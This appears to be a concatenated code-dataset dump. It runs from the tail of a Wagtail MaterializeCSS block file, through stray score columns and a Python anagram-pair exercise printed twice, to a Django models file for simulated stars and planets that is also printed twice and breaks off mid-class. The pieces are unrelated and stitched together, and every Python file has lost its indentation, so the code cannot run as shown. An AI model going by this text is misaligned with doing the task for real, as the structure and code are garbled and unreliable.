background_color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
text_color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
class Meta:
label = _('Card')
template = 'wagtail_materializecss/components/card.html'
class CollectionItem(blocks.StructBlock):
"""CollectionItem ('li' tag) is a list item that belongs in a stylized collection."""
title = blocks.CharBlock()
secondary_icon = blocks.CharBlock(default='', required=False, blank=True)
class Meta:
label = _('Collection Item')
icon = 'list-ul'
template = 'wagtail_materializecss/components/collection_item.html'
class CollectionLink(CollectionItem):
"""CollectionLink ('li' tag) is a link inside of list item that belongs in a stylized collection."""
page = blocks.PageChooserBlock(label="page", required=False,
help_text="Link to an existing page.")
external_url = blocks.URLBlock(label="external URL", required=False,
help_text="Alternative external link if a page is not set.")
class Meta:
label = _('Collection Link')
icon = 'link'
value_class = LinkStructValue
template = 'wagtail_materializecss/components/collection_link.html'
class CollectionHeader(CollectionItem):
"""CollectionHeader ('li' tag) is a large header for a stylized collection."""
class Meta:
label = _('Collection Header')
icon = 'title'
template = 'wagtail_materializecss/components/collection_header.html'
class CollectionAvatar(blocks.StructBlock):
"""CollectionAvatar ('li' tag) is a bigger collection item that includes an image or icon."""
image = ImageChooserBlock(required=False, blank=True, help_text="Main image (icon is an alternative option)")
icon = blocks.CharBlock(required=False, blank=True, help_text="Main image as an icon instead of an image.")
title = blocks.CharBlock()
content = blocks.RichTextBlock(default='', required=False, blank=True)
secondary_icon = blocks.CharBlock(default='', required=False, blank=True)
class Meta:
label = _('Collection Avatar')
icon = 'user'
template = 'wagtail_materializecss/components/collection_avatar.html'
class Collection(blocks.StreamBlock):
"""Collection ('ul' tag) is a stylized list containing different collection items."""
header = CollectionHeader(required=False, blank=True)
link = CollectionLink(required=False, blank=True)
item = CollectionItem(required=False, blank=True)
avatar = CollectionAvatar(required=False, blank=True)
class Meta:
label = _('Collection')
icon = 'list-ul'
# value_class = HasHeaderValue
template = 'wagtail_materializecss/components/collection.html'
def get_context(self, value, parent_context=None):
context = super().get_context(value, parent_context=parent_context)
value.has_header = any((block.block_type == 'header' for block in context['value']))
return context
class Icon(blocks.CharBlock):
"""Simple icon tag for Material Icons."""
class Meta:
label = _('Icon')
template = 'wagtail_materializecss/components/icon.html'
class PageColorStructValue(blocks.StructValue):
def color_value(self):
color = self.get('color')
page = self.get('page')
if color:
return color
elif page:
try:
return page.color
except AttributeError:
pass
class Preloader(blocks.StructBlock):
"""Preloader ('div' tag) progress bar."""
determinate = blocks.BooleanBlock(default=False, required=False, blank=True)
circular = blocks.BooleanBlock(default=True, required=False, blank=True)
color = blocks.CharBlock(required=False, blank=True, help_text='Preloader color (leave blank to use page color.)')
class Meta:
label = _('Preloader')
icon = 'spinner'
value_class = PageColorStructValue
template = 'wagtail_materializecss/components/preloader.html' | 0.764452 | 0.094343 |
import math
import os
import random
import re
import sys
def anagrams_in_string(s):
'''
Given a string, find the number of pairs of substrings of the string that are anagrams of each other.
For example 'mom', the list of all anagrammatic pairs is [m,m], [mo, om].
Anagrams = the letters of one string can be rearranged to form the other string.
'abba' => [a,a], [b,b], [ab, ba], [abb, bba]
'''
# Get all substrings.
subs = [s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)]
total = 0
sorted_dict = {}
for sub in subs:
sorted_dict[sub] = sorted(sub)
for i in range(len(subs)):
for j in range(i + 1, len(subs)):
if sorted_dict[subs[i]] == sorted_dict[subs[j]]:
total += 1
print(total)
return total
# Maybe, after getting a substring, sort it and put it in lookup dict
# Make an entry if it doesn't exist
# If not, increment
# For each entry that has value 2, increment total of pairs.
# For brute force, compare each substring with the other substrings to see if they are anagrams.
# To see if anagrams, sorted lists of letters would be equal. For one way.
# anagrams_in_string('abba') # 4
# anagrams_in_string('ifailuhkqq') # 3
# 10 <-- ['k', 'kk', 'kkk', 'kkkk', 'k', 'kk', 'kkk', 'k', 'kk', 'k']
# anagrams_in_string('kkkk')
# # 6 [k,k] + 3 [kk,kk] + 1 [kkk,kkk]
anagrams_in_string('cdcd') # 5 <-- [c,c], [d,d], [cd,dc], [cd, cd], [dc, cd]
'''
# Version with answer dictionary:
# Get all substrings.
subs = [s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)]
# print(subs)
total = 0
sorted_dict = {}
answer_dict = {}
for sub in subs:
sorted_dict[sub] = sorted(sub)
answer_dict[sub] = []
# print(sorted_dict)
for i in range(len(subs)):
for j in range(i + 1, len(subs)):
if subs[j] in answer_dict[subs[i]]:
total += 1
elif sorted_dict[subs[i]] == sorted_dict[subs[j]]:
total += 1
answer_dict[subs[i]].append(subs[j])
print(total)
return total
'''
'''
# Version with dictionary of key/value sorted_substring : instances of it
subs = [s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)]
subs_dict = {}
for sub in subs:
sub_list = sorted(sub)
print(sub_list)
sub_str = ''.join([str(elem) for elem in sub_list])
print(sub_str)
if sub_str in subs_dict:
subs_dict[sub_str] += 1
else:
subs_dict[sub_str] = 1
print(subs_dict)
total = 0
for item in subs_dict.items():
if item[1] > 1:
total += 1
print(total)
return total
''' | strings/anagrams_in_string.py | import math
import os
import random
import re
import sys
def anagrams_in_string(s):
'''
Given a string, find the number of pairs of substrings of the string that are anagrams of each other.
For example 'mom', the list of all anagrammatic pairs is [m,m], [mo, om].
Anagrams = the letters of one string can be rearranged to form the other string.
'abba' => [a,a], [b,b], [ab, ba], [abb, bba]
'''
# Get all substrings.
subs = [s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)]
total = 0
sorted_dict = {}
for sub in subs:
sorted_dict[sub] = sorted(sub)
for i in range(len(subs)):
for j in range(i + 1, len(subs)):
if sorted_dict[subs[i]] == sorted_dict[subs[j]]:
total += 1
print(total)
return total
# Maybe, after getting a substring, sort it and put it in lookup dict
# Make an entry if it doesn't exist
# If not, increment
# For each entry that has value 2, increment total of pairs.
# For brute force, compare each substring with the other substrings to see if they are anagrams.
# To see if anagrams, sorted lists of letters would be equal. For one way.
# anagrams_in_string('abba') # 4
# anagrams_in_string('ifailuhkqq') # 3
# 10 <-- ['k', 'kk', 'kkk', 'kkkk', 'k', 'kk', 'kkk', 'k', 'kk', 'k']
# anagrams_in_string('kkkk')
# # 6 [k,k] + 3 [kk,kk] + 1 [kkk,kkk]
anagrams_in_string('cdcd') # 5 <-- [c,c], [d,d], [cd,dc], [cd, cd], [dc, cd]
'''
# Version with answer dictionary:
# Get all substrings.
subs = [s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)]
# print(subs)
total = 0
sorted_dict = {}
answer_dict = {}
for sub in subs:
sorted_dict[sub] = sorted(sub)
answer_dict[sub] = []
# print(sorted_dict)
for i in range(len(subs)):
for j in range(i + 1, len(subs)):
if subs[j] in answer_dict[subs[i]]:
total += 1
elif sorted_dict[subs[i]] == sorted_dict[subs[j]]:
total += 1
answer_dict[subs[i]].append(subs[j])
print(total)
return total
'''
'''
# Version with dictionary of key/value sorted_substring : instances of it
subs = [s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)]
subs_dict = {}
for sub in subs:
sub_list = sorted(sub)
print(sub_list)
sub_str = ''.join([str(elem) for elem in sub_list])
print(sub_str)
if sub_str in subs_dict:
subs_dict[sub_str] += 1
else:
subs_dict[sub_str] = 1
print(subs_dict)
total = 0
for item in subs_dict.items():
if item[1] > 1:
total += 1
print(total)
return total
''' | 0.097589 | 0.415492 |
from django.contrib.gis.geos import *
from django.contrib.gis.measure import D
from procyon.starsystemmaker.space_helpers import *
from django.contrib.gis.db import models
from procyon.starcatalog.models import Star, StarType, StarLuminosityType
import json
class StarModel(models.Model):
"""
Additional data and simulated info about stars.
Data needs to be generated using 'build_model' before being accessed
"""
star = models.OneToOneField(Star, db_index=True, help_text="The star with real data", default=1)
star_type = models.ForeignKey(StarType, help_text="Stellar Classification", blank=True, null=True)
luminosity_class = models.ForeignKey(StarLuminosityType, help_text="Luminosity Class (0-VII)", blank=True, null=True)
luminosity_mod = models.CharField(max_length=5, help_text="Luminosity sub class (a, ab, b, a-0", blank=True, null=True)
base_color = models.CharField(max_length=8, help_text="Basic RBG Color", default="#ffddbe", blank=True, null=True)
rand_seed = models.FloatField(help_text="Random Seed from 0-1 used to build notional system", blank=True, null=True, default=0)
guessed_temp = models.FloatField(help_text="Guessed at Temperature", blank=True, null=True, default=0)
guessed_mass = models.FloatField(help_text="Guessed at Mass", blank=True, null=True, default=0)
guessed_radius = models.FloatField(help_text="Guessed at Radius", blank=True, null=True, default=0)
guessed_age = models.FloatField(help_text="Guessed at Age", blank=True, null=True, default=0)
json_of_closest_stars = models.TextField(help_text="List of Stars, will be filled in automatically on first calculation", blank=True, null=True)
ids_of_companion_stars = models.CharField(max_length=30, help_text="Comma-separated IDs of any stars within .3 LY", blank=True, null=True)
location = models.PointField(db_index=True, dim=3, blank=True, null=True, srid=900913)
objects = models.GeoManager()
def build_model(self, star_id=None, star_prime=None, forced=False):
np.random.seed()
self.add_rand_seed(forced)
if not star_prime and not star_id:
star_prime = self.star
if star_prime:
self.star = star_prime
else:
self.star = Star.objects.get(id=star_id)
if self.star:
star_a, star_b, star_c, star_d = get_star_type(self.star.spectrum)
self.add_type(star_a)
self.add_color(star_a, star_b, star_c)
self.add_luminosity(star_c)
self.luminosity_mod = star_d
self.add_rand_variables(forced)
self.save()
def add_rand_seed(self, forced=False):
add_it = True
if not forced and self.rand_seed:
add_it = False
if add_it:
self.rand_seed = np.random.random() #rand_range(0, 1)
self.save()
def add_rand_variables(self, forced=False):
add_it = True
if not forced and self.guessed_temp:
add_it = False
if add_it:
options = {'rand_seed': self.rand_seed, 'star_type': self.star_type,
'temp': 0, 'mass': 0, 'age': 0, 'radius': 0,
'luminosity_class': self.luminosity_class, 'luminosity_mod': self.luminosity_mod}
settings = star_variables(options)
self.guessed_temp = settings.get('temp', 0)
self.guessed_mass = settings.get('mass', 0)
self.guessed_radius = settings.get('radius', 0)
self.guessed_age = settings.get('age', 0)
self.save()
def add_luminosity(self, star_c):
result = "ok"
try:
star_type = StarLuminosityType.objects.get(symbol=star_c)
self.luminosity_class = star_type
except StarLuminosityType.DoesNotExist:
result = "unknown"
return result
def add_type(self, star_a):
result = "ok"
try:
star_type = StarType.objects.get(symbol=star_a)
self.star_type = star_type
except StarType.DoesNotExist:
result = "unknown"
return result
def add_color(self, star_a="K", star_b="", star_c=""):
star = self
found_color = ""
if star_a or star_b or star_c:
found_color = color_of_star(star_a, star_b, star_c)
if not found_color and star.star and star.star.spectrum:
star_a, star_b, star_c = get_star_type(star.star.spectrum)
found_color = color_of_star(star_a, star_b, star_c)
if not found_color:
if star.star_type and star.star_type.base_color:
found_color = star.star_type.base_color
star.base_color = found_color
star.save()
class Meta:
verbose_name_plural = 'Stars (Simulated)'
ordering = ['star']
def nearby_stars(self, force_regenerate=False):
if self.json_of_closest_stars and not force_regenerate:
star_list = json.loads(self.json_of_closest_stars)
else:
star_list = closest_stars(self, StarModel)
self.json_of_closest_stars = json.dumps(star_list)
self.save()
return star_list
def nearby_stars_json(self):
self.nearby_stars()
return self.json_of_closest_stars
def nearby_stars_json_force_recalc(self):
self.nearby_stars(force_regenerate=True)
return self.json_of_closest_stars
additional_methods = ['nearby_stars', ]
def get_params(self, requested_methods=None, only_variables=None):
"""
Converts parameters to object.
Options:
requested_methods = ['__unicode__', ] (to also call these functions and return results)
only_variables = ['name', 'title', ] (to only return values of these model variables)
"""
additional_methods = self.additional_methods
if requested_methods:
additional_methods = requested_methods + additional_methods
dumps = dict()
if not only_variables:
model_fields = [field.name for field in self._meta.fields]
else:
model_fields = only_variables
for field in model_fields:
val = self.__getattribute__(field)
if type(val) == Point:
point = dict()
point['x'] = val.x
point['y'] = val.y
point['z'] = val.z
dumps[str(field)] = point
else:
dumps[str(field)] = str(val)
for func in additional_methods:
dumps[func] = getattr(self, func)()
return dumps
class PlanetType(models.Model):
"""
Planet Types (from http://en.wikipedia.org/wiki/List_of_planet_types)
"""
name = models.CharField(max_length=30, help_text="Short description", blank=True, null=True)
mass_range = models.CharField(max_length=30, help_text="Mass Range in sextillion tonnes (10^24. Earth=5.9)", blank=True, null=True)
radius_range = models.CharField(max_length=30, help_text="Radius Range in km (Earth=6371)", blank=True, null=True)
age_range = models.CharField(max_length=30, help_text="Age Range in million years (Earth=4540)", blank=True, null=True)
surface_area_range = models.CharField(max_length=30, help_text="Surface Area Range in million km^2 (Earth=510.1)", blank=True, null=True)
moon_range = models.CharField(max_length=30, help_text="Average number of moons (Earth=1)", blank=True, null=True)
density_range = models.CharField(max_length=30, help_text="Density Range in % (Earth=1)", blank=True, null=True)
length_days_range = models.CharField(max_length=30, help_text="Day Length Range in hours (Earth=24)", blank=True, null=True)
temperature_range = models.CharField(max_length=30, help_text="Temperature Range in C (Earth=15)", blank=True, null=True)
magnetic_field_range = models.CharField(max_length=30, help_text="Amount of magnetic field, 0 for none. (Earth=1, Jupiter=19519)", blank=True, null=True, default=0)
craterization_range = models.CharField(max_length=30, help_text="Amount of surface bombardment, 0 for none. (Earth=1)", blank=True, null=True, default=0)
mineral_surface = models.BooleanField(help_text="Is surface made of rock?", blank=True)
solid_core = models.BooleanField(help_text="Is core solid?", blank=True)
plate_tectonics = models.BooleanField(help_text="Is surface made of moving plates?", blank=True)
def __unicode__(self):
return '{0}'.format(self.name)
class Meta:
verbose_name_plural = 'Types of Planets'
class PlanetFeature(models.Model):
"""
Major features of a planetary body
"""
short_name = models.CharField(db_index=True, max_length=60, help_text="Short Description of Planetary Feature", blank=True, null=True)
details = models.TextField(help_text="Detailed Description of Planetary Feature", blank=True, null=True)
rules_required = models.TextField(help_text="What attributes of the planet must be true to have this feature?", blank=True, null=True)
rules_more_likely = models.TextField(help_text="What attributes of the planet double the chances to have this feature?", blank=True, null=True)
likelihood = models.FloatField(help_text="How likely is a planet to have this feature (0 to 1) given that the above are met?", blank=True, null=True, default="0.1")
class PlanetModel(models.Model):
"""
Simulated Planets
"""
name = models.CharField(db_index=True, max_length=60, help_text="Planet Common Name", blank=True, null=True)
planet_type = models.ForeignKey(PlanetType, help_text="Type of planet", default=1, blank=True, null=True)
mass = models.FloatField(db_index=True, help_text="Estimated Mass (Earth=1, Mercury=.05, Mars=.1, Jupiter=317)", blank=True, null=True)
radius = models.FloatField(help_text="Estimated Radius (Earth=1, Mercury=.382, Jupiter=10.97, Saturn=9.14) ", blank=True, null=True)
density = models.FloatField(help_text="Density in g/cm^3 (Earth=5.51, Jupiter=1.33, Saturn=0.68, Pluto=1.75)", blank=True, null=True)
gravity = models.FloatField(help_text="Surface Gravity (g=m/r^2, Earth=1, Mercury=0.38, Jupiter=2.53, Pluto=0.067)", blank=True, null=True)
oblateness = models.FloatField(help_text="How squished it is (Earth=.0034, Venus=0, Saturn=.0979)", blank=True, null=True)
tilt = models.FloatField(help_text="Axial Tilt (Earth=23.4, Uranus=97, Venus=177)", blank=True, null=True)
albedo = models.FloatField(help_text="How much light does the surface reflect (0 to 1)", blank=True, null=True)
length_days = models.FloatField(help_text="How many hours are the days (Earth=24)", blank=True, null=True)
surface_temp_low = models.CharField(max_length=30, help_text="Low Temperature in C", blank=True, null=True, default=0)
surface_temp_high = models.CharField(max_length=30, help_text="Low Temperature in C", blank=True, null=True, default=0)
magnetic_field = models.FloatField(help_text="How strong a magnetic field (Earth=1, Jupiter=19519)", blank=True, null=True)
craterization = models.FloatField(help_text="How many craters? (Earth=1, Moon=2, Mars=3, Jupiter=0)", blank=True, null=True)
#TODO: Figure out how to have a list of minerals and amounts that makes sense for coloring, mining, changing
#TODO: Same for atmosphere gasses
mineral_surface_early = models.FloatField(help_text="% Amount of H, He, C (0 to 1)", blank=True, null=True)
mineral_surface_mid = models.FloatField(help_text="% Amount of N, O, Fe (0 to 1)", blank=True, null=True)
mineral_surface_heavy = models.FloatField(help_text="% Amount of Heavier Metals (0 to 1)", blank=True, null=True)
mineral_surface_late = models.FloatField(help_text="% Amount of Exotic Metals (0 to 1)", blank=True, null=True)
minerals_specific = models.CharField(max_length=100, help_text="Comma-separated list of specific notable minerals", blank=True, null=True, default="")
solid_core_size = models.FloatField(help_text="Percentage size of planet that is core (0 to 1, Earth=.31)", blank=True, null=True)
solid_core_type = models.CharField(max_length=30, help_text="Type of Core", blank=True, null=True, default="Iron")
plate_tectonics_amount = models.FloatField(help_text="Amount of tectonics and plate movement (Earth=1, Io=20)", blank=True, null=True)
surface_solidity = models.FloatField(help_text="How solid is surface (Inner=1, Gas Giants=0)", blank=True, null=True)
surface_ocean_amount = models.FloatField(help_text="% surface is covered with liquid (0 to 1, Earth=.71)", blank=True, null=True)
surface_ocean_chemicals = models.CharField(max_length=100, help_text="Main composition of surface oceans (Earth=Salt Water, Titan=Ethane and Methane", blank=True, null=True, default="")
subsurface_ocean_amount = models.FloatField(help_text="% of subsurface that is liquid (0 to 1, Europa=1.0)", blank=True, null=True)
ice_amount_north_pole = models.FloatField(help_text="% North Pole is covered with ice (0 to 1, Earth=.01)", blank=True, null=True)
ice_amount_south_pole = models.FloatField(help_text="% South Pole is covered with ice (0 to 1, Earth=.01)", blank=True, null=True)
ice_amount_total = models.FloatField(help_text="% overall surface is covered with ice, not counting poles (0 to 1, Europa=1.0)", blank=True, null=True)
semi_major_axis = models.FloatField(help_text="Semi-major Axis in au", blank=True, null=True)
revolution = models.FloatField(help_text="Revolutions per earth day", blank=True, null=True)
orbital_period = models.FloatField(help_text="Orbital Period in days", blank=True, null=True)
orbital_eccentricity = models.FloatField(help_text="Orbital Eccentricity", blank=True, null=True)
periastron = models.FloatField(help_text="Degrees of Periastron", blank=True, null=True)
periastron_time = models.FloatField(help_text="Time of Periastron in JD", blank=True, null=True)
velocity_semi_amplitude = models.FloatField(help_text="Semiamplitude of doppler variation", blank=True, null=True)
ring_size = models.FloatField(help_text="Size of rings (as percentage of radius)", blank=True, null=True)
ring_numbers = models.IntegerField(help_text="Number of ring groups", blank=True, null=True)
atmosphere_millibars = models.FloatField(help_text="Pressure of atmosphere in Millibars (Mars=7, Earth=1013.25)", blank=True, null=True)
atmosphere_main_gas = models.CharField(max_length=30, help_text="Major gas (70%), if any", blank=True, null=True)
atmosphere_secondary_gas = models.CharField(max_length=30, help_text="Second gas (20%), if any", blank=True, null=True)
atmosphere_tertiary_gas = models.CharField(max_length=30, help_text="Tertiary gas (9%), if any", blank=True, null=True)
atmosphere_dust_amount = models.FloatField(help_text="Grams of dust/m^2 (Earth=1, Moon=1000, Mars=500)", blank=True, null=True)
surface_wind_speeds_avg = models.FloatField(help_text="Average Wind Speeds in km/hr (Mars=108, Earth=17, Neptune=700)", blank=True, null=True)
surface_wind_speeds_max = models.FloatField(help_text="Max Wind Speeds in km/hr (Mars=288, Earth=400, Neptune=2100)", blank=True, null=True)
other_name = models.CharField(db_index=True, max_length=60, help_text="Alternate Planet Common Name", blank=True, null=True)
parent_star = models.ForeignKey(Star, db_index=True, help_text="The star that it orbits", blank=True, null=True)
parent_planet = models.ForeignKey('self', db_index=True, help_text="A planet that it orbits", blank=True, null=True)
major_features = models.ManyToManyField(PlanetFeature, help_text="What features are significant on this planet", blank=True, null=True)
def __unicode__(self):
name = self.name
if self.other_name:
name = '{0} [{1}]'.format(self.name, self.other_name)
return name
class Meta:
verbose_name_plural = 'Planets (Simulated)'
ordering = ['name']
additional_methods = ['__unicode__', ]
def get_params(self, requested_methods=None, only_variables=None):
"""
Converts parameters to object.
Options:
requested_methods = ['__unicode__', ] (to also call these functions and return results)
only_variables = ['name', 'title', ] (to only return values of these model variables)
"""
additional_methods = self.additional_methods
if requested_methods:
additional_methods = requested_methods + additional_methods
dumps = dict()
if not only_variables:
model_fields = [field.name for field in self._meta.fields]
else:
model_fields = only_variables
for field in model_fields:
dumps[str(field)] = str(self.__getattribute__(field))
for func in additional_methods:
dumps[func] = getattr(self, func)()
return dumps | procyon/starsystemmaker/models.py | from django.contrib.gis.geos import *
from django.contrib.gis.measure import D
from procyon.starsystemmaker.space_helpers import *
from django.contrib.gis.db import models
from procyon.starcatalog.models import Star, StarType, StarLuminosityType
import json
class StarModel(models.Model):
"""
Additional data and simulated info about stars.
Data needs to be generated using 'build_model' before being accessed
"""
star = models.OneToOneField(Star, db_index=True, help_text="The star with real data", default=1)
star_type = models.ForeignKey(StarType, help_text="Stellar Classification", blank=True, null=True)
luminosity_class = models.ForeignKey(StarLuminosityType, help_text="Luminosity Class (0-VII)", blank=True, null=True)
luminosity_mod = models.CharField(max_length=5, help_text="Luminosity sub class (a, ab, b, a-0", blank=True, null=True)
base_color = models.CharField(max_length=8, help_text="Basic RBG Color", default="#ffddbe", blank=True, null=True)
rand_seed = models.FloatField(help_text="Random Seed from 0-1 used to build notional system", blank=True, null=True, default=0)
guessed_temp = models.FloatField(help_text="Guessed at Temperature", blank=True, null=True, default=0)
guessed_mass = models.FloatField(help_text="Guessed at Mass", blank=True, null=True, default=0)
guessed_radius = models.FloatField(help_text="Guessed at Radius", blank=True, null=True, default=0)
guessed_age = models.FloatField(help_text="Guessed at Age", blank=True, null=True, default=0)
json_of_closest_stars = models.TextField(help_text="List of Stars, will be filled in automatically on first calculation", blank=True, null=True)
ids_of_companion_stars = models.CharField(max_length=30, help_text="Comma-separated IDs of any stars within .3 LY", blank=True, null=True)
location = models.PointField(db_index=True, dim=3, blank=True, null=True, srid=900913)
objects = models.GeoManager()
def build_model(self, star_id=None, star_prime=None, forced=False):
np.random.seed()
self.add_rand_seed(forced)
if not star_prime and not star_id:
star_prime = self.star
if star_prime:
self.star = star_prime
else:
self.star = Star.objects.get(id=star_id)
if self.star:
star_a, star_b, star_c, star_d = get_star_type(self.star.spectrum)
self.add_type(star_a)
self.add_color(star_a, star_b, star_c)
self.add_luminosity(star_c)
self.luminosity_mod = star_d
self.add_rand_variables(forced)
self.save()
def add_rand_seed(self, forced=False):
add_it = True
if not forced and self.rand_seed:
add_it = False
if add_it:
self.rand_seed = np.random.random() #rand_range(0, 1)
self.save()
def add_rand_variables(self, forced=False):
add_it = True
if not forced and self.guessed_temp:
add_it = False
if add_it:
options = {'rand_seed': self.rand_seed, 'star_type': self.star_type,
'temp': 0, 'mass': 0, 'age': 0, 'radius': 0,
'luminosity_class': self.luminosity_class, 'luminosity_mod': self.luminosity_mod}
settings = star_variables(options)
self.guessed_temp = settings.get('temp', 0)
self.guessed_mass = settings.get('mass', 0)
self.guessed_radius = settings.get('radius', 0)
self.guessed_age = settings.get('age', 0)
self.save()
def add_luminosity(self, star_c):
result = "ok"
try:
star_type = StarLuminosityType.objects.get(symbol=star_c)
self.luminosity_class = star_type
except StarLuminosityType.DoesNotExist:
result = "unknown"
return result
def add_type(self, star_a):
result = "ok"
try:
star_type = StarType.objects.get(symbol=star_a)
self.star_type = star_type
except StarType.DoesNotExist:
result = "unknown"
return result
def add_color(self, star_a="K", star_b="", star_c=""):
star = self
found_color = ""
if star_a or star_b or star_c:
found_color = color_of_star(star_a, star_b, star_c)
if not found_color and star.star and star.star.spectrum:
star_a, star_b, star_c = get_star_type(star.star.spectrum)
found_color = color_of_star(star_a, star_b, star_c)
if not found_color:
if star.star_type and star.star_type.base_color:
found_color = star.star_type.base_color
star.base_color = found_color
star.save()
class Meta:
verbose_name_plural = 'Stars (Simulated)'
ordering = ['star']
def nearby_stars(self, force_regenerate=False):
if self.json_of_closest_stars and not force_regenerate:
star_list = json.loads(self.json_of_closest_stars)
else:
star_list = closest_stars(self, StarModel)
self.json_of_closest_stars = json.dumps(star_list)
self.save()
return star_list
def nearby_stars_json(self):
self.nearby_stars()
return self.json_of_closest_stars
def nearby_stars_json_force_recalc(self):
self.nearby_stars(force_regenerate=True)
return self.json_of_closest_stars
additional_methods = ['nearby_stars', ]
def get_params(self, requested_methods=None, only_variables=None):
"""
Converts parameters to object.
Options:
requested_methods = ['__unicode__', ] (to also call these functions and return results)
only_variables = ['name', 'title', ] (to only return values of these model variables)
"""
additional_methods = self.additional_methods
if requested_methods:
additional_methods = requested_methods + additional_methods
dumps = dict()
if not only_variables:
model_fields = [field.name for field in self._meta.fields]
else:
model_fields = only_variables
for field in model_fields:
val = self.__getattribute__(field)
if type(val) == Point:
point = dict()
point['x'] = val.x
point['y'] = val.y
point['z'] = val.z
dumps[str(field)] = point
else:
dumps[str(field)] = str(val)
for func in additional_methods:
dumps[func] = getattr(self, func)()
return dumps
class PlanetType(models.Model):
"""
Planet Types (from http://en.wikipedia.org/wiki/List_of_planet_types)
"""
name = models.CharField(max_length=30, help_text="Short description", blank=True, null=True)
mass_range = models.CharField(max_length=30, help_text="Mass Range in sextillion tonnes (10^24. Earth=5.9)", blank=True, null=True)
radius_range = models.CharField(max_length=30, help_text="Radius Range in km (Earth=6371)", blank=True, null=True)
age_range = models.CharField(max_length=30, help_text="Age Range in million years (Earth=4540)", blank=True, null=True)
surface_area_range = models.CharField(max_length=30, help_text="Surface Area Range in million km^2 (Earth=510.1)", blank=True, null=True)
moon_range = models.CharField(max_length=30, help_text="Average number of moons (Earth=1)", blank=True, null=True)
density_range = models.CharField(max_length=30, help_text="Density Range in % (Earth=1)", blank=True, null=True)
length_days_range = models.CharField(max_length=30, help_text="Day Length Range in hours (Earth=24)", blank=True, null=True)
temperature_range = models.CharField(max_length=30, help_text="Temperature Range in C (Earth=15)", blank=True, null=True)
magnetic_field_range = models.CharField(max_length=30, help_text="Amount of magnetic field, 0 for none. (Earth=1, Jupiter=19519)", blank=True, null=True, default=0)
craterization_range = models.CharField(max_length=30, help_text="Amount of surface bombardment, 0 for none. (Earth=1)", blank=True, null=True, default=0)
mineral_surface = models.BooleanField(help_text="Is surface made of rock?", blank=True)
solid_core = models.BooleanField(help_text="Is core solid?", blank=True)
plate_tectonics = models.BooleanField(help_text="Is surface made of moving plates?", blank=True)
def __unicode__(self):
return '{0}'.format(self.name)
class Meta:
verbose_name_plural = 'Types of Planets'
class PlanetFeature(models.Model):
"""
Major features of a planetary body
"""
short_name = models.CharField(db_index=True, max_length=60, help_text="Short Description of Planetary Feature", blank=True, null=True)
details = models.TextField(help_text="Detailed Description of Planetary Feature", blank=True, null=True)
rules_required = models.TextField(help_text="What attributes of the planet must be true to have this feature?", blank=True, null=True)
rules_more_likely = models.TextField(help_text="What attributes of the planet double the chances to have this feature?", blank=True, null=True)
likelihood = models.FloatField(help_text="How likely is a planet to have this feature (0 to 1) given that the above are met?", blank=True, null=True, default="0.1")
class PlanetModel(models.Model):
"""
Simulated Planets
"""
name = models.CharField(db_index=True, max_length=60, help_text="Planet Common Name", blank=True, null=True)
planet_type = models.ForeignKey(PlanetType, help_text="Type of planet", default=1, blank=True, null=True)
mass = models.FloatField(db_index=True, help_text="Estimated Mass (Earth=1, Mercury=.05, Mars=.1, Jupiter=317)", blank=True, null=True)
radius = models.FloatField(help_text="Estimated Radius (Earth=1, Mercury=.382, Jupiter=10.97, Saturn=9.14) ", blank=True, null=True)
density = models.FloatField(help_text="Density in g/cm^3 (Earth=5.51, Jupiter=1.33, Saturn=0.68, Pluto=1.75)", blank=True, null=True)
gravity = models.FloatField(help_text="Surface Gravity (g=m/r^2, Earth=1, Mercury=0.38, Jupiter=2.53, Pluto=0.067)", blank=True, null=True)
oblateness = models.FloatField(help_text="How squished it is (Earth=.0034, Venus=0, Saturn=.0979)", blank=True, null=True)
tilt = models.FloatField(help_text="Axial Tilt (Earth=23.4, Uranus=97, Venus=177)", blank=True, null=True)
albedo = models.FloatField(help_text="How much light does the surface reflect (0 to 1)", blank=True, null=True)
length_days = models.FloatField(help_text="How many hours are the days (Earth=24)", blank=True, null=True)
surface_temp_low = models.CharField(max_length=30, help_text="Low Temperature in C", blank=True, null=True, default=0)
surface_temp_high = models.CharField(max_length=30, help_text="Low Temperature in C", blank=True, null=True, default=0)
magnetic_field = models.FloatField(help_text="How strong a magnetic field (Earth=1, Jupiter=19519)", blank=True, null=True)
craterization = models.FloatField(help_text="How many craters? (Earth=1, Moon=2, Mars=3, Jupiter=0)", blank=True, null=True)
#TODO: Figure out how to have a list of minerals and amounts that makes sense for coloring, mining, changing
#TODO: Same for atmosphere gasses
mineral_surface_early = models.FloatField(help_text="% Amount of H, He, C (0 to 1)", blank=True, null=True)
mineral_surface_mid = models.FloatField(help_text="% Amount of N, O, Fe (0 to 1)", blank=True, null=True)
mineral_surface_heavy = models.FloatField(help_text="% Amount of Heavier Metals (0 to 1)", blank=True, null=True)
mineral_surface_late = models.FloatField(help_text="% Amount of Exotic Metals (0 to 1)", blank=True, null=True)
minerals_specific = models.CharField(max_length=100, help_text="Comma-separated list of specific notable minerals", blank=True, null=True, default="")
solid_core_size = models.FloatField(help_text="Percentage size of planet that is core (0 to 1, Earth=.31)", blank=True, null=True)
solid_core_type = models.CharField(max_length=30, help_text="Type of Core", blank=True, null=True, default="Iron")
plate_tectonics_amount = models.FloatField(help_text="Amount of tectonics and plate movement (Earth=1, Io=20)", blank=True, null=True)
surface_solidity = models.FloatField(help_text="How solid is surface (Inner=1, Gas Giants=0)", blank=True, null=True)
surface_ocean_amount = models.FloatField(help_text="% surface is covered with liquid (0 to 1, Earth=.71)", blank=True, null=True)
surface_ocean_chemicals = models.CharField(max_length=100, help_text="Main composition of surface oceans (Earth=Salt Water, Titan=Ethane and Methane", blank=True, null=True, default="")
subsurface_ocean_amount = models.FloatField(help_text="% of subsurface that is liquid (0 to 1, Europa=1.0)", blank=True, null=True)
ice_amount_north_pole = models.FloatField(help_text="% North Pole is covered with ice (0 to 1, Earth=.01)", blank=True, null=True)
ice_amount_south_pole = models.FloatField(help_text="% South Pole is covered with ice (0 to 1, Earth=.01)", blank=True, null=True)
ice_amount_total = models.FloatField(help_text="% overall surface is covered with ice, not counting poles (0 to 1, Europa=1.0)", blank=True, null=True)
